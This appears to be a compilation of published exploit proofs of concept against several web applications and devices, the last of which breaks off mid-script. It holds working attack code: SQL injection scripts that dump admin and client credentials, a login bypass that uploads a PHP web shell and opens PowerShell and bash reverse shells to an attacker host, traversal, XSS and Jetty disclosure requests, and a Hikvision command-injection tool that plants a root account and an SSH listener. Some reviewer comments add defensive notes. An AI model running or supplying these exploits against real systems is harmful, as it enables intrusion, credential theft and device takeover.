
# Exploit Title: Online Motorcycle (Bike) Rental System 1.0 - Blind Time-Based SQL Injection (Unauthenticated)
# Exploit Author: Chase Comardelle(CASO)
# Date: October 18, 2021
# Vendor Homepage: https://www.sourcecodester.com/php/14989/online-motorcycle-bike-rental-system-phpoop-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/bike_rental_0.zip
# Tested on: Kali Linux, Apache, Mysql
# Vendor: oretnom23
# Version: v1.0
# Exploit Description:
# Online Motorcycle (Bike) Rental System is vulnerable to a Blind Time-Based SQL Injection attack. This can lead attackers to remotely dump MySql database credentials
#EXAMPLE PAYLOAD - test@email.com' UNION SELECT IF((SELECT SUBSTRING((SELECT password from users where username='admin'),1,1)='1'),sleep(10),'a'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL;
#EXAMPLE EXECUTION - python3 sqliExploit.py http://localhost/bike_rental/
#
# NOTE(review): every extraction helper below drives the same sink, the
# unauthenticated login handler at /classes/Login.php?f=login_user, whose
# `email` form field is evidently placed into a UNION-able query (nine columns,
# see the payload strings). Defender notes, derived only from what this PoC
# sends: the remediation is a parameterised lookup for the login query; the
# observable signature is a burst of POSTs to that path whose body contains
# `sleep(` and `GROUP_CONCAT(` and whose response times cluster just above the
# injected delay.

import requests
import sys
import urllib3
import pyfiglet

# Silences the warning emitted by verify=False on every request below.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# NOTE(review): defined but never passed to requests.post() in this file.
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}


def find_clients_usernames(url):
    """Recover the comma-joined `clients.email` column, one character at a time.

    url: base URL of the application; the login path is appended.
    Returns the recovered string. Extraction stops at the first position
    where no entry of the module-level `chars` alphabet causes a delayed
    response (end of the value, or a character outside the alphabet).
    Uses the module-level `chars` list and the `requests` module.
    """
    clients = ""
    # NOTE(review): 'Cookie:' is used here as a cookie *name*, so this sends
    # an empty cookie named "Cookie:" rather than a PHPSESSID value.
    cookies = {'Cookie:':'PHPSESSID='}
    headers = {'DNT': '1', 'SEC-GPC': '1', 'Referer' : 'http://localhost/bike_rental/','Origin': 'http://localhost','X-Requested-With' : 'XMLHttpRequest','Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8'}
    path = '/classes/Login.php?f=login_user'
    position = 1
    i=0
    while i <len(chars) :
        # One request per (position, candidate character); sleep(1) fires only
        # when the SUBSTRING comparison is true.
        sqli = "email=test@email.com'UNION+SELECT+IF((SELECT+SUBSTRING((SELECT+GROUP_CONCAT(email+SEPARATOR+',')+from+clients),%s,1)='%s'),sleep(1),''),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-&password=test" %(position,chars[i])
        r = requests.post(url + path,data=sqli,headers=headers,cookies=cookies, verify=False)
        # Timing oracle: a response slower than the injected delay is taken as
        # a match. Any network stall above 1 s is also counted as a match.
        if r.elapsed.total_seconds() > 1:
            clients += chars[i]
            i=0
            position+=1
        else:
            i +=1
    return clients


def find_db_usernames(url):
    """Recover the comma-joined `users.username` column via the same timing oracle.

    url: base URL of the application; the login path is appended.
    Returns the recovered string (see find_clients_usernames for the stop rule).
    """
    users = ""
    cookies = {'Cookie:':'PHPSESSID='}
    headers = {'DNT': '1', 'SEC-GPC': '1', 'Referer' : 'http://localhost/bike_rental/','Origin': 'http://localhost','X-Requested-With' : 'XMLHttpRequest','Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8'}
    path = '/classes/Login.php?f=login_user'
    position = 1
    i=0
    while i <len(chars) :
        sqli = "email=test@email.com'UNION+SELECT+IF((SELECT+SUBSTRING((SELECT+GROUP_CONCAT(username+SEPARATOR+',')+from+users),%s,1)='%s'),sleep(1),''),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-&password=test" %(position,chars[i])
        r = requests.post(url + path,data=sqli,headers=headers,cookies=cookies, verify=False)
        if r.elapsed.total_seconds() > 1:
            users += chars[i]
            i=0
            position+=1
        else:
            i +=1
    return users


def find_db_passwords(url):
    """Recover the comma-joined `users.password` column via the same timing oracle.

    url: base URL of the application; the login path is appended.
    Returns the recovered string. Note the alphabet in `chars` covers only
    alphanumerics plus '@', '#', ',' and '.', so any other character ends
    extraction early.
    """
    passwords = ""
    clientCount = 0  # NOTE(review): never read
    cookies = {'Cookie:':'PHPSESSID='}
    headers = {'DNT': '1', 'SEC-GPC': '1', 'Referer' : 'http://localhost/bike_rental/','Origin': 'http://localhost','X-Requested-With' : 'XMLHttpRequest','Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8'}
    path = '/classes/Login.php?f=login_user'
    position = 1
    i=0
    while i <len(chars) :
        sqli = "email=test@email.com'UNION+SELECT+IF((SELECT+SUBSTRING((SELECT+GROUP_CONCAT(password+SEPARATOR+',')+from+users),%s,1)='%s'),sleep(1),''),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-&password=test" %(position,chars[i])
        r = requests.post(url + path,data=sqli,headers=headers,cookies=cookies, verify=False)
        if r.elapsed.total_seconds() > 1:
            passwords += chars[i]
            i=0
            position+=1
        else:
            i +=1
    return passwords


def find_client_passwords(url):
    """Recover the comma-joined `clients.password` column via the same timing oracle.

    url: base URL of the application; the login path is appended.
    Returns the recovered string (see find_db_passwords for the alphabet caveat).
    """
    passwords = ""
    clientCount = 0  # NOTE(review): never read
    cookies = {'Cookie:':'PHPSESSID='}
    headers = {'DNT': '1', 'SEC-GPC': '1', 'Referer' : 'http://localhost/bike_rental/','Origin': 'http://localhost','X-Requested-With' : 'XMLHttpRequest','Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8'}
    path = '/classes/Login.php?f=login_user'
    position = 1
    i=0
    while i <len(chars) :
        sqli = "email=test@email.com'UNION+SELECT+IF((SELECT+SUBSTRING((SELECT+GROUP_CONCAT(password+SEPARATOR+',')+from+clients),%s,1)='%s'),sleep(1),''),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-&password=test" %(position,chars[i])
        r = requests.post(url + path,data=sqli,headers=headers,cookies=cookies, verify=False)
        if r.elapsed.total_seconds() > 1:
            passwords += chars[i]
            i=0
            position+=1
        else:
            i +=1
    return passwords


def create_table(users,passwords):
    """Print `users[i] | passwords[i]` for every index of `users`.

    Indexes `passwords` by the same position, so it raises IndexError when
    `passwords` is shorter than `users`.
    """
    for i in range(0,len(users)):
        print(users[i]," | ",passwords[i])


def print_header():
    """Print the tool banner (uses pyfiglet for the figlet line)."""
    print("[*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*]")
    print("[*] Online Motorcycle (Bike) Rental System [*]")
    print("[*] Unauthenticated Blind Time-Based SQL Injection [*]")
    print("[*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*]")
    print("\n")
    print(pyfiglet.figlet_format(" CAS0", font = "slant" ))


# Candidate alphabet tried at each position; the GROUP_CONCAT separator ','
# is included so that the per-row join survives extraction.
chars = [ 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o',
          'p','q','r','s','t','u','v','w','x','y','z','A','B','C','D',
          'E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S',
          'T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7',
          '8','9','@','#',",",'.']


if __name__ == "__main__":
    try:
        url = sys.argv[1].strip()
    except IndexError:
        print("[-] Usage: %s <url>" % sys.argv[0])
        print("[-] Example: %s www.example.com" % sys.argv[0])
        sys.exit(-1)
    print_header()
    print("[*] RETRIEVING CREDENTIALS NOW [*]")
    dbUsernames = find_db_usernames(url)
    dbUsernames = dbUsernames.split(",")
    dbPasswords = find_db_passwords(url)
    dbPasswords = dbPasswords.split(",")
    print("[*] DATABASE CREDENTIALS [*]")
    create_table(dbUsernames,dbPasswords)
    clientUsernames = find_clients_usernames(url)
    # NOTE(review): the split result is bound to `clientsUsernames` (with an
    # extra "s"); that is the name used below.
    clientsUsernames = clientUsernames.split(",")
    clientPasswords = find_client_passwords(url)
    clientPasswords = clientPasswords.split(",")
    print("[*] CLIENT CREDENTIALS [*]")
    create_table(clientsUsernames,clientPasswords)
  2. # Exploit Title: NIMax 5.3.1f0 - 'VISA Alias' Denial of Service (PoC) # Date: 24/06/2021 # Exploit Author: LinxzSec # Vulnerability: Local Denial of Service (DoS) # Vendor Homepage: https://www.ni.com/en-gb.html # Software Link: License Required - https://knowledge.ni.com/KnowledgeArticleDetails?id=kA03q000000YGQwCAO&l=en-GB # Tested Version: 5.3.1f0 # Tested On: Windows 10 Pro x64 '''[ POC ] 1 - Copy printed "AAAAA..." string from "nimax.txt" 2 - Open NIMax.exe 3 - Drop down "My System" then drop down "Software" 5 - Locate "NI-VISA 5.2" and select it 6 - Open the "VISA Options" tab 7 - Drop down "General settings" 8 - Select "Aliases" 9 - Select "Add alias" 10 - Paste string from "nimax.txt" into "Resource name" 11 - Just put a single character in the alias and press "ok", DoS will occur ''' buffer = "\x41" * 5000 try: f = open("nimax.txt", "w") f.write(buffer) f.close() print("[+] File created!") except: print("[+] File could not be created!")
# Exploit Title: Clinic Management System 1.0 - SQL injection to Remote Code Execution
# Date:21/10/2021
# Exploit Author: Pablo Santiago
# Vendor Homepage: https://www.sourcecodester.com/php/14243/open-source-clinic-management-system-php-full-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/Nikhil_B/clinic-full-source-code-with-database_0.zip
# Version: 1.0
# Tested on: Windows 7 and Ubuntu 21.10
# References: https://medium.com/@Pablo0xSantiago/clinic-management-system-1-0-sql-injection-bypass-to-remote-code-execution-804bceac037e
# Vulnerability: Through SQL injection to bypass the login form it is
# possible to upload a malicious file and after use that malicious file to
# execute code in the remote system.
# Proof of Concept:
#
# NOTE(review): two distinct weaknesses are chained here, and each needs its
# own fix: (1) login.php accepts an `email` value that terminates the query
# (`' OR 1 -- -`), so the login lookup must be parameterised; (2)
# manage_website.php stores the `website_image` upload under
# uploadImage/Logo/ with the client-supplied name and extension, so the
# handler must enforce an image allow-list and serve the directory without
# script execution. Observable artifacts of a run: a new .php file in
# uploadImage/Logo/ and GET requests to it carrying a `cmd` query parameter.

import requests
import sys
import time

# One session is shared by every request so the PHPSESSID obtained at login
# is reused for the upload.
session = requests.Session()

#http_proxy = "http://127.0.0.1:8080"
#https_proxy = "https://127.0.0.1:8080"
#proxyDict = {"http" : http_proxy,
#             "https" : https_proxy}


def windows(HPW,host,shell_name):
    """Trigger the uploaded web shell with a PowerShell reverse-shell command.

    HPW: already-quoted "'LHOST',LPORT" fragment built in main().
    host: base URL of the application.
    shell_name: basename (without .php) chosen for the uploaded file.
    Returns None. A ReadTimeout is expected and ignored because the remote
    command blocks for as long as the connection back is open.
    """
    payload = """powershell+-nop+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient("""+HPW+""")%3b$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0){%3b$data+%3d+(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString($bytes,0,+$i)%3b$sendback+%3d+(iex+$data+2>%261+|+Out-String+)%3b$sendback2+%3d+$sendback+%2b+'PS+'+%2b+(pwd).Path+%2b+'>+'%3b$sendbyte+%3d+([text.encoding]%3a%3aASCII).GetBytes($sendback2)%3b$stream.Write($sendbyte,0,$sendbyte.Length)%3b$stream.Flush()}%3b$client.Close()"""""
    host2 = host+'/'+'uploadImage/Logo/' + shell_name + '.php?cmd='+payload
    #print(payload)
    try:
        request_rce = requests.get(host2,timeout=8)
    except requests.exceptions.ReadTimeout:
        pass


def linux(HPL,host,shell_name):
    """Trigger the uploaded web shell with a bash /dev/tcp reverse-shell command.

    HPL: "LHOST/LPORT" fragment built in main().
    host: base URL of the application.
    shell_name: basename (without .php) chosen for the uploaded file.
    Returns None; the ReadTimeout is expected, as in windows().
    """
    payload = 'bash+-c+"bash+-i+>%26+/dev/tcp/'+HPL+'+0>%261"'
    # NOTE(review): the doubled slash ('/' + '/uploadImage') differs from the
    # Windows path above; most servers collapse it.
    host2 = host+'/'+'/uploadImage/Logo/' + shell_name + '.php?cmd='+payload
    #print(payload)
    try:
        request_rce = requests.get(host2,timeout=8)
    except requests.exceptions.ReadTimeout:
        pass


def main():
    """Log in via the SQL injection, upload the web shell, then prompt for the callback.

    Reads sys.argv[1] (host URL) and sys.argv[2] (shell basename); raises
    IndexError when they are missing. Exits the interpreter after handing off
    to windows() or linux(); any other menu choice prints a message and returns.
    """
    host = sys.argv[1]
    shell_name = sys.argv[2]
    url = host + '/login.php'
    # The `email` value closes the string and comments out the rest of the
    # query, so the password check is never reached.
    values = {'user': "admin", 'email': "' OR 1 -- -", 'password': '', 'btn_login': "" }
    r = session.post(url, data=values)
    # KeyError here means the login bypass did not yield a session cookie.
    cookie = session.cookies.get_dict()['PHPSESSID']
    data = { 'btn_web':''}
    headers= {'Cookie': 'PHPSESSID='+cookie}
    # The upload field accepts a .php filename; the stored file becomes the
    # one-line web shell requested by windows()/linux().
    request = session.post(host+ '/manage_website.php', data=data, headers=headers,files={"website_image":(shell_name+'.php',"<?=`$_GET[cmd]`?>")})
    print("")
    print('[*] Your Simple Webshell was uploaded to ' + host + '/uploadImage/Logo/' + shell_name + '.php' )
    print("")
    LHOST = input('[+] Enter your LHOST: ')
    LPORT = input('[+] Enter your LPORT: ')
    print("")
    HPW= "'"+LHOST+"'"+','+LPORT
    HPL= ""+LHOST+""+'/'+LPORT
    print('[+] Option 1: Windows')
    print('[+] Option 2: Linux')
    option = input('[+] Choose OS: ')
    if option == "1":
        windows(HPW,host,shell_name)
        exit()
    elif option == "2":
        linux(HPL,host,shell_name)
        exit()
    else:
        print("Please choose Windows or Linux")


# NOTE(review): runs on import as well as on execution (no __name__ guard).
main()
#Usage: python3 host shell_name
#Example: python3 http://localhost/clinic shell
  4. # Exploit Title: Easy Chat Server 3.1 - Directory Traversal and Arbitrary File Read # Date: 11 October 2021 # Exploit Author: z4nd3r # Vendor Homepage: http://www.echatserver.com/ # Software Link: http://www.echatserver.com/ # Version: 3.1 # Tested on: Windows 10 Pro Build 19042, English # # Description: # The web server allows for directory traversal and reading of arbitrary files on the # system, given that the account running the server can access the target file. Proof-of-concept using Burp: Request: GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1 Host: 192.168.50.52 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 ---------------------------------------- Response: HTTP/1.0 200 OK Date: Thu, 21 Oct 2021 14:55:57 GMT Server: Easy Chat Server/1.0 Accept-Ranges: bytes Content-Length: 92 Connection: close Content-Type: text/html ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1
  5. # Exploit Title: Small CRM 3.0 - 'description' Stored Cross-Site Scripting (XSS) # Date: 20/10/2021 # Exploit Author: Ghuliev # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/small-crm-php/ # Version: 3.0 # Tested on: Server: Ubuntu When a user or admin creates a ticket, we can inject javascript code into ticket. POST /crm/create-ticket.php HTTP/1.1 Host: IP Content-Length: 79 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://IP Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://IP/crm/create-ticket.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9,az;q=0.8,ru;q=0.7 subject=aa&tasktype=Select+your+Task+Type&priority=&description=</textarea><script>alert(1)</script>&send=Send
  6. # Exploit Title: Jetty 9.4.37.v20210219 - Information Disclosure # Date: 2021-10-21 # Exploit Author: Mayank Deshmukh # Vendor Homepage: https://www.eclipse.org/jetty/ # Software Link: https://repo1.maven.org/maven2/org/eclipse/jetty/jetty-distribution/9.4.37.v20210219/ # Version: 9.4.37.v20210219 and 9.4.38.v20210224 # Tested on: Kali Linux # CVE : CVE-2021-28164 POC #1 - web.xml GET /%2e/WEB-INF/web.xml HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0
# Exploit Title: Hikvision Web Server Build 210702 - Command Injection
# Exploit Author: bashis
# Vendor Homepage: https://www.hikvision.com/
# Version: 1.0
# CVE: CVE-2021-36260
# Reference: https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html
# All credit to Watchful_IP
#!/usr/bin/env python3
"""
Note:
1) This code will _not_ verify if remote is Hikvision device or not.
2) Most of my interest in this code has been concentrated on how to reliably detect vulnerable and/or exploitable devices.
   Some devices are easy to detect, verify and exploit the vulnerability, other devices may be vulnerable but not so easy to verify and exploit.
   I think the combined verification code should have very high accuracy.
3) 'safe check' (--check) will try write and read for verification
   'unsafe check' (--reboot) will try reboot the device for verification

[Examples]
Safe vulnerability/verify check:
$./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check

Safe and unsafe vulnerability/verify check:
(will only use 'unsafe check' if not verified with 'safe check')
$./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check --reboot

Unsafe vulnerability/verify check:
$./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --reboot

Launch and connect to SSH shell:
$./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --shell

Execute command:
$./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd "ls -l"

Execute blind command:
$./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd_blind "reboot"

$./CVE-2021-36260.py -h
[*] Hikvision CVE-2021-36260
[*] PoC by bashis <mcw noemail eu> (2021)
usage: CVE-2021-36260.py [-h] --rhost RHOST [--rport RPORT] [--check] [--reboot] [--shell] [--cmd CMD] [--cmd_blind CMD_BLIND] [--noverify] [--proto {http,https}]

optional arguments:
  -h, --help            show this help message and exit
  --rhost RHOST         Remote Target Address (IP/FQDN)
  --rport RPORT         Remote Target Port
  --check               Check if vulnerable
  --reboot              Reboot if vulnerable
  --shell               Launch SSH shell
  --cmd CMD             execute cmd (i.e: "ls -l")
  --cmd_blind CMD_BLIND execute blind cmd (i.e: "reboot")
  --noverify            Do not verify if vulnerable
  --proto {http,https}  Protocol used
$
"""
# NOTE(review): defender-side summary of what this PoC leaves behind, taken
# only from the commands it sends. The --check path writes a zero-byte file
# `c` into the device's webLib directory and fetches it as /c; --cmd writes
# command output to webLib/x and fetches /x; --shell writes a file `N`
# containing a uid-0 passwd line for user "P", appends it to /etc/passwd,
# starts dropbear on TCP 1337 and copies `N` to webLib/N. Each of those files
# and the listening port are concrete indicators to look for on a device.
# The injection sink is a PUT to /SDK/webLanguage whose <language> value is
# not sanitised; the referenced advisory covers the firmware fix.
import os
import argparse
import time
import requests
from requests import packages
from requests.packages import urllib3
from requests.packages.urllib3 import exceptions


class Http(object):
    """requests.Session wrapper bound to one device (rhost:rport, proto).

    send() is the only entry point the module-level functions use; it carries
    either a plain GET (url given, no query_args) or the injected PUT.
    """

    def __init__(self, rhost, rport, proto, timeout=60):
        super(Http, self).__init__()
        self.rhost = rhost
        self.rport = rport
        self.proto = proto
        self.timeout = timeout  # NOTE(review): stored but not read by send()/put()/get()
        self.remote = None
        self.uri = None
        """ Most devices will use self-signed certificates, suppress any warnings """
        requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
        self.remote = requests.Session()
        self._init_uri()
        self.remote.headers.update({
            'Host': f'{self.rhost}:{self.rport}',
            'Accept': '*/*',
            'X-Requested-With': 'XMLHttpRequest',
            'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
            'Accept-Encoding': 'gzip, deflate',
            'Accept-Language': 'en-US,en;q=0.9,sv;q=0.8',
        })
        """
        self.remote.proxies.update({
            # 'http': 'http://127.0.0.1:8080',
        })
        """

    def send(self, url=None, query_args=None, timeout=5):
        """Issue one request, retrying once over the other scheme on ConnectionError.

        url: path for a plain GET (used when query_args is falsy).
        query_args: shell command to inject via put(); rejected above 22 bytes.
        timeout: per-request timeout in seconds.
        Returns the requests.Response, or None on connection failure, other
        request errors, KeyboardInterrupt, or an over-long command.
        """
        if query_args:
            """Some devices can handle more, others less, 22 bytes seems like a good compromise"""
            if len(query_args) > 22:
                print(f'[!] Error: Command "{query_args}" to long ({len(query_args)})')
                return None
        """This weird code will try automatically switch between http/https and update Host """
        try:
            if url and not query_args:
                return self.get(url, timeout)
            else:
                data = self.put('/SDK/webLanguage', query_args, timeout)
        except requests.exceptions.ConnectionError:
            # NOTE(review): both branches of this conditional yield 'https',
            # so a failed https attempt is retried over https, not http.
            self.proto = 'https' if self.proto == 'http' else 'https'
            self._init_uri()
            try:
                if url and not query_args:
                    return self.get(url, timeout)
                else:
                    data = self.put('/SDK/webLanguage', query_args, timeout)
            except requests.exceptions.ConnectionError:
                return None
        except requests.exceptions.RequestException:
            return None
        except KeyboardInterrupt:
            return None
        """302 when requesting http on https enabled device"""
        if data.status_code == 302:
            # Follow the redirect manually so the Host header tracks the new base URI.
            redirect = data.headers.get('Location')
            self.uri = redirect[:redirect.rfind('/')]
            self._update_host()
            if url and not query_args:
                return self.get(url, timeout)
            else:
                data = self.put('/SDK/webLanguage', query_args, timeout)
        return data

    def _update_host(self):
        """Set the Host header to the authority part of self.uri if it differs."""
        if not self.remote.headers.get('Host') == self.uri[self.uri.rfind('://') + 3:]:
            self.remote.headers.update({
                'Host': self.uri[self.uri.rfind('://') + 3:],
            })

    def _init_uri(self):
        """Rebuild self.uri as '<proto>://<rhost>:<rport>' from the current fields."""
        self.uri = '{proto}://{rhost}:{rport}'.format(proto=self.proto, rhost=self.rhost, rport=str(self.rport))

    def put(self, url, query_args, timeout):
        """Command injection in the <language> tag"""
        # The command is wrapped in $(...) inside the XML body; certificate
        # verification is off and redirects are handled by send().
        query_args = '<?xml version="1.0" encoding="UTF-8"?>' \
                     f'<language>$({query_args})</language>'
        return self.remote.put(self.uri + url, data=query_args, verify=False, allow_redirects=False, timeout=timeout)

    def get(self, url, timeout):
        """Plain GET of self.uri + url with verification and redirects disabled."""
        return self.remote.get(self.uri + url, verify=False, allow_redirects=False, timeout=timeout)


def check(remote, args):
    """
    status_code == 200 (OK); Verified vulnerable and exploitable
    status_code == 500 (Internal Server Error); Device may be vulnerable, but most likely not
    The SDK webLanguage tag is there, but generate status_code 500 when language not found
    I.e. Exist: <language>en</language> (200), not exist: <language>EN</language> (500)
    (Issue: Could also be other directory than 'webLib', r/o FS etc...)
    status_code == 401 (Unauthorized); Definitely not vulnerable

    Returns True when verified (or when --noverify skips the test), False when
    not vulnerable or not a matching device, None when no connection could be
    made. May delegate to check_reboot() when --reboot was given.
    """
    if args.noverify:
        print(f'[*] Not verifying remote "{args.rhost}:{args.rport}"')
        return True
    print(f'[*] Checking remote "{args.rhost}:{args.rport}"')
    data = remote.send(url='/', query_args=None)
    if data is None:
        print(f'[-] Cannot establish connection to "{args.rhost}:{args.rport}"')
        return None
    print('[i] ETag:', data.headers.get('ETag'))
    # Safe check: create an empty file webLib/c, then see whether it is served
    # as /c (presumably webLib is the served document root — not shown here).
    data = remote.send(query_args='>webLib/c')
    if data is None or data.status_code == 404:
        print(f'[-] "{args.rhost}:{args.rport}" do not looks like Hikvision')
        return False
    status_code = data.status_code
    data = remote.send(url='/c', query_args=None)
    if not data.status_code == 200:
        """We could not verify command injection"""
        if status_code == 500:
            print(f'[-] Could not verify if vulnerable (Code: {status_code})')
            if args.reboot:
                return check_reboot(remote, args)
        else:
            print(f'[+] Remote is not vulnerable (Code: {status_code})')
        return False
    print('[!] Remote is verified exploitable')
    return True


def check_reboot(remote, args):
    """
    We sending 'reboot', wait 2 sec, then checking with GET request.
    - if there is data returned, we can assume remote is not vulnerable.
    - If there is no connection or data returned, we can assume remote is vulnerable.

    Returns True when the device stops answering, False otherwise. This is the
    disruptive check: it reboots a vulnerable device.
    """
    if args.check:
        print('[i] Checking if vulnerable with "reboot"')
    else:
        print(f'[*] Checking remote "{args.rhost}:{args.rport}" with "reboot"')
    remote.send(query_args='reboot')
    time.sleep(2)
    if not remote.send(url='/', query_args=None):
        print('[!] Remote is vulnerable')
        return True
    else:
        print('[+] Remote is not vulnerable')
        return False


def cmd(remote, args):
    """Run args.cmd on the device and print its output.

    The command's stdout is redirected to webLib/x and read back as /x.
    Returns True on success, False when check() fails or the output file
    could not be fetched.
    """
    if not check(remote, args):
        return False
    data = remote.send(query_args=f'{args.cmd}>webLib/x')
    if data is None:
        return False
    data = remote.send(url='/x', query_args=None)
    if data is None or not data.status_code == 200:
        print(f'[!] Error execute cmd "{args.cmd}"')
        return False
    print(data.text)
    return True


def cmd_blind(remote, args):
    """ Blind command injection """
    # No output is read back; a 500 from the PUT is treated as "accepted".
    if not check(remote, args):
        return False
    data = remote.send(query_args=f'{args.cmd_blind}')
    if data is None or not data.status_code == 500:
        print(f'[-] Error execute cmd "{args.cmd_blind}"')
        return False
    print(f'[i] Try execute blind cmd "{args.cmd_blind}"')
    return True


def shell(remote, args):
    """Plant a uid-0 account and a dropbear listener, then exec ssh to it.

    Returns False when check() fails or the first write is rejected (401);
    otherwise falls through to os.system() and returns None. The presence of
    /N on the device is used as the "already done" marker.
    """
    if not check(remote, args):
        return False
    data = remote.send(url='/N', query_args=None)
    if data.status_code == 404:
        print(f'[i] Remote "{args.rhost}" not pwned, pwning now!')
        # Builds the passwd line "P::0:0:W:/:/bin/sh" in file N across two writes.
        data = remote.send(query_args='echo -n P::0:0:W>N')
        if data.status_code == 401:
            print(data.headers)
            print(data.text)
            return False
        remote.send(query_args='echo :/:/bin/sh>>N')
        remote.send(query_args='cat N>>/etc/passwd')
        remote.send(query_args='dropbear -R -B -p 1337')
        remote.send(query_args='cat N>webLib/N')
    else:
        print(f'[i] Remote "{args.rhost}" already pwned')
    print(f'[*] Trying SSH to {args.rhost} on port 1337')
    # Host-key checking is disabled and known_hosts discarded for the throwaway
    # connection; the stty calls restore terminal modes first.
    os.system(f'stty echo; stty iexten; stty icanon; \
    ssh -o StrictHostKeyChecking=no -o LogLevel=error -o UserKnownHostsFile=/dev/null \
    P@{args.rhost} -p 1337')


def main():
    """Parse the command line and dispatch to exactly one action.

    Precedence when several flags are given: --shell, --cmd, --cmd_blind,
    --check, --reboot; with none of them the help text is printed.
    Returns False on KeyboardInterrupt, otherwise None.
    """
    print('[*] Hikvision CVE-2021-36260\n[*] PoC by bashis <mcw noemail eu> (2021)')
    parser = argparse.ArgumentParser()
    parser.add_argument('--rhost', required=True, type=str, default=None, help='Remote Target Address (IP/FQDN)')
    parser.add_argument('--rport', required=False, type=int, default=80, help='Remote Target Port')
    parser.add_argument('--check', required=False, default=False, action='store_true', help='Check if vulnerable')
    parser.add_argument('--reboot', required=False, default=False, action='store_true', help='Reboot if vulnerable')
    parser.add_argument('--shell', required=False, default=False, action='store_true', help='Launch SSH shell')
    parser.add_argument('--cmd', required=False, type=str, default=None, help='execute cmd (i.e: "ls -l")')
    parser.add_argument('--cmd_blind', required=False, type=str, default=None, help='execute blind cmd (i.e: "reboot")')
    parser.add_argument(
        '--noverify', required=False, default=False, action='store_true', help='Do not verify if vulnerable'
    )
    parser.add_argument(
        '--proto', required=False, type=str, choices=['http', 'https'], default='http', help='Protocol used'
    )
    args = parser.parse_args()
    remote = Http(args.rhost, args.rport, args.proto)
    try:
        if args.shell:
            shell(remote, args)
        elif args.cmd:
            cmd(remote, args)
        elif args.cmd_blind:
            cmd_blind(remote, args)
        elif args.check:
            check(remote, args)
        elif args.reboot:
            check_reboot(remote, args)
        else:
            parser.parse_args(['-h'])
    except KeyboardInterrupt:
        return False


if __name__ == '__main__':
    main()
# Exploit Title: Online Course Registration 1.0 - Blind Boolean-Based SQL Injection (Authenticated)
# Exploit Author: Sam Ferguson (@AffineSecurity) and Drew Jones (@qhum7sec)
# Date: 2021-10-21
# Vendor Homepage: https://www.sourcecodester.com/php/14251/online-course-registration.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-course-registration.zip
# Version: 1.0
# Tested On: Windows 10 + XAMPP + Python 3
# Vulnerability: An attacker can perform a blind boolean-based SQL injection attack, which can provide attackers
# with access to the username and md5 hash of any administrators.
# Vulnerable file: /online-course-registration/Online/pincode-verification.php
# Proof of Concept:
#!/usr/bin/python3
#
# NOTE(review): the sink is the `pincode` field of pincode-verification.php,
# reached only after a valid student login (hence "Authenticated"). The
# oracle is the string 'Course Enroll' in the response body. Remediation is a
# parameterised query for the pincode lookup; the traffic signature is a
# large number of POSTs to that page from one session, each with a `pincode`
# value containing `substring(` and `from admin`.

import requests
import sys
import string


def exploit(hostname, username, password):
    """Log in as the given student and recover the admin username and password hash.

    hostname: scheme and host, e.g. http://127.0.0.1:80 (paths are appended).
    username / password: credentials for an existing student account.
    Returns None; results are written to stdout character by character.
    """
    # Building bruteforce list
    pass_list = list(string.ascii_lowercase)
    pass_list += list(range(0,10))
    pass_list = map(str, pass_list)
    pass_list = list(pass_list)
    # NOTE(review): this binds the same list object, so the `+=` below also
